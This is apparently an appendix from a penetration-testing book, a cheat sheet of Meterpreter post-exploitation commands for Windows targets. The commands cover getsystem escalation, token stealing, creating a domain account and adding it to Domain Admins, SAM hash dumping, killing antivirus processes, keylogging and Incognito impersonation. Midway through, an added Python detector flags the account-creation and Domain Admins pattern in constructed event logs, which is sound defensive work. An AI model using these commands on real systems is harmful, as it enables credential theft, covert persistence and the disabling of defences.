Appendix B
Meterpreter Post Exploitation Commands
Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > use priv
meterpreter > getsystem
Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:

meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32> net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32> net group "Domain Admins" metasploit /ADD /DOMAIN
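The two net commands above leave a distinctive trace in Windows process-creation auditing (Security event 4688 with command-line logging enabled), and the pairing of an account creation with an immediate addition to Domain Admins is a strong signal for a blue team. The following detector is an added example written for this appendix; it is not code from the book or from the Metasploit project. It assumes a simplified, constructed log line format (timestamp, host, user, cmd fields) and constructed sample events; the field names and the 600-second correlation window are assumptions, not a real SIEM schema.

```python
import re
import shlex
from dataclasses import dataclass
from datetime import datetime

# Constructed sample lines in the shape of Windows Security event 4688
# (process creation, command-line auditing on). These are not real logs;
# the field layout is simplified for the example.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:01 host=WS01 user=CORP\\alice cmd=net user /DOMAIN",
    "2024-01-01T10:00:05 host=WS01 user=CORP\\alice cmd=net user metasploit p@55w0rd /ADD /DOMAIN",
    '2024-01-01T10:00:09 host=WS01 user=CORP\\alice cmd=net group "Domain Admins" metasploit /ADD /DOMAIN',
    '2024-01-01T10:01:00 host=WS02 user=CORP\\bob cmd=net group "Domain Admins" /DOMAIN',
]

# Assumed line layout: "<iso timestamp> host=<h> user=<u> cmd=<command line>"
EVENT_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


@dataclass
class Event:
    ts: str
    host: str
    user: str
    cmd: str


@dataclass
class Alert:
    severity: str
    host: str
    user: str
    message: str


def parse_event(line):
    """Parse one constructed log line into an Event, or None if it does not match."""
    m = EVENT_RE.match(line)
    return Event(**m.groupdict()) if m else None


def classify(cmd):
    """Classify a command line as ('user_add', account, via_domain) when it is
    'net user <acct> [pw] /ADD', or ('group_add', account, via_domain) when it is
    'net group "Domain Admins" <acct> /ADD'. Anything else returns None."""
    try:
        # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
        toks = [t.strip('"') for t in shlex.split(cmd, posix=False)]
    except ValueError:
        return None  # unbalanced quotes: not something we can tokenize
    if len(toks) < 3:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe not in ("net", "net1"):
        return None
    flags = {t.lower() for t in toks if t.startswith("/")}
    if "/add" not in flags:
        return None  # read-only queries such as 'net user /DOMAIN' are benign
    via_domain = "/domain" in flags
    sub = toks[1].lower()
    if sub == "user":
        return ("user_add", toks[2], via_domain)
    if (sub == "group" and toks[2].lower() == "domain admins"
            and len(toks) > 3 and not toks[3].startswith("/")):
        return ("group_add", toks[3], via_domain)
    return None


def detect(lines, window_seconds=600):
    """Run the classifier over log lines and correlate account creation with a
    later Domain Admins addition on the same host within window_seconds."""
    alerts = []
    created = {}  # (host, account) -> timestamp of the 'net user /ADD'
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        hit = classify(ev.cmd)
        if hit is None:
            continue
        kind, acct, via_domain = hit
        key = (ev.host, acct.lower())
        scope = "domain" if via_domain else "local"
        if kind == "user_add":
            created[key] = datetime.fromisoformat(ev.ts)
            alerts.append(Alert("medium", ev.host, ev.user,
                                f"{scope} account {acct} created with net user /ADD"))
        else:  # group_add
            severity, msg = "high", f"{acct} added to Domain Admins"
            if key in created:
                delta = (datetime.fromisoformat(ev.ts) - created[key]).total_seconds()
                if 0 <= delta <= window_seconds:
                    severity = "critical"
                    msg += f" {int(delta)}s after the account was created on this host"
            alerts.append(Alert(severity, ev.host, ev.user, msg))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running the block on the constructed events yields one medium alert for the account creation and one critical alert for the Domain Admins addition four seconds later on the same host; the read-only `net user /DOMAIN` and `net group "Domain Admins" /DOMAIN` queries produce nothing, which keeps the rule quiet on routine administrative enumeration. The tokenizer deliberately matches both `net` and `net1` and full paths to the executable, since the command may be logged either way.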
Dump password hashes from the SAM database:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump
NOTE: On Win2k8 you may need to migrate to a process that is running as SYSTEM if getsystem and hashdump throw exceptions.
Automigrate to a separate process:

meterpreter > run migrate
Kill antivirus processes running on the target via the killav Meterpreter script:

meterpreter > run killav
Capture keystrokes on target machines from within a particular process:

meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Use Incognito to impersonate an administrator:

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem